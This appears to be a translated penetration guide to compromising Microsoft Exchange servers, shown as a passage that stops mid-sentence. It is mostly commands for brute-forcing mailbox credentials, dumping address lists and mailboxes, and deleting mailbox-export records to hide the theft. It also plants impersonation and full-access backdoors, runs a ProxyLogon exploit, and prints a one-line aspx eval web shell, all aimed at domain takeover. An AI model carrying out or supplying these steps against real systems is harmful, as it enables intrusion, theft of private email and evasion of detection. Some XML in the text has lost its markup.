Title: Exchange Mail Service Penetration Tips

During the penetration process, the Exchange mail server is usually the object we focus on. Because after taking down the Exchange mail server, with the permissions of its machine account, we can give other users in the domain dcsync permissions, and then export the hash in the domain and take down the entire domain.

In the exchange system, configure powershell using the command https://learn.microsoft.com/zh-cn/powershell/module/exchange/add-mailboxfolderpermission?view=exchange-ps

Scan Service

setspn.exe

setspn.exe -T vvvv1.com -F -Q */* | findstr exchange

nmap

nmap 192.168.52.139 -A

Probe Versions and Vulnerabilities

Obtain the precise version information of exchange through the ews interface

Disadvantages: Some old exchange versions do not support this operation.

Get rough version information of exchange through the Owa interface

After obtaining the version number, you can go to the official website to check the corresponding Exchange version and release date.

Query address:

https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2016

Use scripts to detect versions and vulnerabilities

https://github.com/3gstudent/Homework-of-Python/blob/master/Exchange_GetVersion_MatchVul.py

Blasting

python2 EBurst.py -d 192.168.52.139 -C

You can also use this tool to blast user account passwords.

python2 EBurst.py -d 192.168.52.139 -L ./users.txt -P ./passwords.txt --ews

Information Collection

Assuming that the credentials of one of the email users have been obtained, information can be collected next.

Information collection through Autodiscover

Through the https://Exchange/autodiscover/autodiscover.xml interface, you can accept xml requests and return the mailbox configuration to which the email specified in xml belongs.

Because NTLMv2 authentication requires HTTP/1.1 connection, and the new version of burpsuit defaults to HTTP/2, we need to adjust it first.

https://blog.csdn.net/qq_30786785/article/details/121742101

For operations such as reading configuration, please refer to the following link.

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Exchange-Autodiscover%E7%9A%84%E4%BD%BF%E7%94%A8

Where basic is authentication, encrypted using base64 VVVV1\administrator:admin!@#456

POST /autodiscover/autodiscover.xml HTTP/1.1

Host: 192.168.52.139

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36

Authorization: Basic VlZWVjFcYWRtaW5pc3RyYXRvcjphZG1pbiFAIzQ1Ng==

Content-Type: text/xml

Content-Length: 350

Autodiscover xmlns='http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006'

Request

[email protected]/EMailAddress

AcceptableResponseSchemahttp://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a/AcceptableResponseSchema

/Request

/Autodiscover

If the email does not exist, it will return

If the mailbox exists, the configuration information will be returned

Get exchange address book

The Global Address List (GAL) contains the email addresses of all email users in the Exchange organization. As long as you obtain the credentials of any email user in the Exchange organization, you can export the email addresses of other email users. You can use OWA, EWS, OAB, RPC over HTTP, MAPI over HTTP, etc. to obtain GAL.

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Exchange-GlobalAddressList%E7%9A%84%E6%96%B9%E6%B3%95

https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/

Use OWA to view directly

Personnel-all users

Get GAL through /EWS interface

Powershell -ExecutionPolicy Bypass

Import-Module .\MailSniper.ps1

Get-GlobalAddressList -ExchHostname 192.168.52.139 -UserName VVVV1\administrator -Password admin!@#456 -OutFile gal.txt

Get GAL through OAB

1. OAB path collected through Autodiscover;

2. Access /OAB/OABURI/oab.xml;

3. Find the LZX file address corresponding to the default global address table through oab.xml, and access /OAB/OABURI/LZXURI to obtain the LZX file;

4. Use the cabextract tool to decode the LZX file and restore the GAL;

https://www.cabextract.org.uk/

Export GAL and information collection through RPC (MAPI) over HTTP

MAPI OVER HTTP is the default communication protocol between Outlook and Exchange 2016

MAPI OVER HTTP is a new transport protocol implemented in Exchange Server 2013 Service Pack 1 (SP1) to replace RPC OVER HTTP (also known as Outlook Anywhere)

MAPI OVER HTTP is not enabled by default in Exchange 2013. The communication protocol between Outlook and Exchange uses RPC OVER HTTP.

Use the impacket-exchanger module to list the address list and find the corresponding guid

python exchanger.py VVVV1/admins:User!@#[email protected] list-tables

Export all users

python exchanger.py VVVV1/admins:User!@#[email protected] dump-tables -guid 784f58c1-8bd1-4d28-81fa-52d22ce95738

Remote export of GAL through python

python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com admins User!@#45 findallpeople

:

Export email content

Download email directly through the /OWA interface

By entering the account password, then read or download the email directly in the page

Export email content through /EWS interface

Remote export of emails through python

It can be exported through plain text password or hash

python ewsManage_Downloader.py 192.168.52.139 443 plaintext vvvv1.com administrator admin!@#456 download

python ewsManage_Downloader.py test.com 80 ntlmhash NULL user1 c5a237b7e9d8e708d8436b6148a25fa1 findallpeople

Exporting emails through python is generally exported using SOAP XML message

Official XML elements documentation:

https://learn.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-xml-elements-in-exchange

Export emails through exshell.ps1

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E4%BB%8EExchange%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%90%9C%E7%B4%A2%E5%92%8C%E5%AF%BC%E5%87%BA%E9%82%AE%E4%BB%B6

Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'New-MailboxExportrequest -mailbox administrator -filepath '\\localhost\c$\exchange1.pst'

Of course, after exporting the email, we also need to clear the traces of the export email.

View email export request history

Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'Get-MailboxExportRequest'

Delete export log records

Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'remove-MailboxExportRequest'

The Identity parameter is the Mailbox parameter in the figure above

Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'remove-MailboxExportRequest -Identity 'vvvv1.com/Users/Administrator\MailboxExport' -Confirm:$false'

Email takes over backdoor planting

Configure simulation permissions

https://4sysops.com/archives/exchange-impersonation-grant-permissions-to-service-accounts/

Just add the following permissions.

Verify that there is simulation permission:

https://192.168.52.139/ecp/[email protected]/

Specific utilization requires combining script files.

View members with mock permissions

Get-ManagementRoleAssignment -Role:ApplicationImpersonation

Powershell.exe -psconsolefile 'C:\\program files\\Microsoft\\Exchange Server\\v15\\Bin\\exshell.psc1' -command 'Get-ManagementRoleAssignment -Role:ApplicationImpersonation'

Create a new member with mock permissions

New-ManagementRoleAssignment -Role:ApplicationImpersonation -User:[email protected]

Delete members who have newly added mock permissions

Remove-ManagementRoleAssignment 'ApplicationImpersonation-admins'

Configure fullaccess permissions

https://blog.csdn.net/weixin_34123613/article/details/90079532

Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | Add-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all

Cancel fullaccess permission

Get-Mailbox -ResultSize unlimited -Filter {(RecipientTypeDetails -eq 'UserMailbox') -and (Alias -ne 'Administrator')} | remove-MailboxPermission -User administrator -AccessRights fullaccess -InheritanceType all

Verify fullaccess permissions

Vulnerability Attack

python ProxyLogon.py --host=exchange.com [email protected]

aspx Trojan: script language='JScript' runat='server' function Page\_Load(){/\*\*/eval(Request\['command'\],'unsafe');}/script

Post-permeation stage

Exchange server information collection

Get the default installation path of exchange

echo %ExchangeInstallPath%

The relative location of the console file is %ExchangeInstallPath%\Bin\exshell.ps1

Get all email information

powershell.exe -psconsolefile 'C:\Program Files\Microsoft\Exchange Server\V15\bin\exshell.psc1' -command 'get-mailbox -resultsize unlimited'

Analyze email tracking log

The email tracking log is located in %Excha